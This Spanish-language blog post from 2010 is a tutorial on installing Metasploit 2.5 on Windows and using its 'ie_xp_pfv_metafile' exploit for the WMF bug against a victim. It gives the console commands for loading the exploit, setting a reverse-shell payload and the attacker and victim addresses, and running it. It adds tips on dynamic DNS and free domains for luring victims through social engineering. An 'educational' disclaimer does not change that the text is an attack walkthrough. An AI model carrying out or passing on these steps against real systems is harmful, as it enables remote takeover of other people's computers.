9 de octubre de 2010

Como instalar Metasploits framework en Windows por Mask

Aclaro que esto fue hecho de una manera rápida, por lo consiguiente quiero pedir una disculpa adelantada por las burradas que en su elaboración pueda haber llegado a cometer, este minitutorial, explica como se lleva a cabo la explotación del bug (tan comentado) en los archivos WMF ocupando el Metasploit, quiero aclarar que lo que todo lo explicado a continuación se ha escrito con motivos de conocimientos y aprendisaje. haha..!!

ya que MetaSploit es bastante novedoso, no muchos saben usarlo, así que aquí va un minitutorialpara el uso y la aplicación de el exploit:

Param comenzar, tendremos que bajarlo e instalarlo (no creo que haya problema con esto...)
http://www.metasploit.com/tools/framework-2.5.exe


esta versión (2.5) es para windows y está escrita en PERL, si buscas la versión para linux puedes buscar la versión 3.0, escrita en RUBY y con algunas mejoras.

bueno, una vez terminada la instalación del metasploit aparecerá la consola principal del programa, por ahora no la necesitaremos, así que la puedes cerrar.

llegados a este punto tenemos que hacer la actualización del metasploit, dirígete hacia el menú del metasploit (Inicio / Todos los Programas / Metasploit Framework) y busca MSFupdate, córrelo y confirma que se desea iniciar la actualización (yes)..
bien, ahora tendremos que repetir el proceso de actualización (ya que esta vez pediremos la actualiuzación de la base de datos de exploits), de esta manera se nos descargará una lista con los exploits nuevos y que tu versión de MetaSploit no tiene...
bueno, entre esta actualización debe de venir el exploit "ie_xp_pfv_metafile", que es el que en este momento ocuparemos como referencia.

una vez terminada la actualización llegó la hora de entrar a la configuración del exploit.. ahora tendremos que elegir que es lo que deseamos utilizar..

Citar
--modo web
o
Citar
--modo consola

en lo personal no me gusta el modo web por lo que les he explicado arriba, así que pasaré a explicar el modo consola (llámenme nostálgico  :cry: Pinguinitoooooooooooo.... no, no, Toritoooooo xDDDD)... aunque una vez entendido el modo consola, no creo que les cueste más entender el modo web basta con entrar en para iniciar el servidor y entrar desde cualquier navegador a http://127.0.0.1:55555...

ok ya que solo es una pequeña demostración de lo que se puede hacer con el MetaSploit paso a explicar los comandos básicos para probar el exploit que se comenta en el post...

Bien; una vez en la consola de comandos se pasa a configurar el programa de la siguiente manera...

msf >

Código:
show exploits  

*para que nos muestre los exploits actuales en la base de datos del programa, entre estos debemos hayar nuestro exploit "ie_xp_pfv_metafile".

msf >
Código:
use ie_xp_pfv_metafile
*esto es para cargar cargar el exploit

msf use ie_xp_pfv_metafile >
Código:
Set LHOST Tu-IP

*ya que utilizaremos una reverse_conect, tendremos que especificar hacia donde se dirigirá la conexión (hasta nosotros)

msf use ie_xp_pfv_metafile >
Código:
Set PAYLOAD Win32_reverse

*así indicaremos que nuestra conexión será de tipo Reverse_Conect (para ver una lista completa de las conexiones que puedes usar teclea Show payloads, todo depende directamente si el expoit permite esto o no).

msf use ie_xp_pfv_metafile
Código:
set RHOST Ip-Víctima 
*solo nos resta colocar a la víctima...

msf use ie_xp_pfv_metafile
Código:
Exploit
*así indicamos que el exploit está listo y que se debe de ejecutar...

El programa nos indica que se ha puesto a la escuecha el puerto 8080 en nuestro servidor xxx.xxx.xxx.xxx con algo como

ahora solo resta esperar a que la víctima se conecte a nuestro servidor, cuando esto suceda, la Víctima no recibirá respuesta por parte de el server del atacante, sin embargo, el Visor de imágenes y fax de Windows se la abrirá y cargará como si estuviera esperando por cargar algo, si cierra esta ventana, el Metaspoit nos avisará con algo como <>, pero la shell quedará activa...

bien creo que es todo, cabe mensionar que esto ya no es tan bueno como cuando se descubrió, ya que ahora la mayoría de los antivirus lo detectan y como dijo philos y GTO, ya hay un parche no oficial y para el miércoles sale el oficial...

Tips:

  • En caso de tener una Ip Dinámica siempre está el "NO - IP" que hace maravillas  
  • si lo que haremos es usar la ingeniería social siempre podemos adquirir un free Domain en servidores como <.Tk>, <.cjb.net> etc..

espero les haya gustado y sobre todo SERVIDO.. y como siempre cabe mencionar que el uso de esta información es puramente educativo y pedir una disculpa por las babosadas que he cometido durante la elaboración del texto haha..!!

 Salidos xD

0 comentarios:

Publicar un comentario

Dejanos un Comentario, apoyanos para seguir ayudandote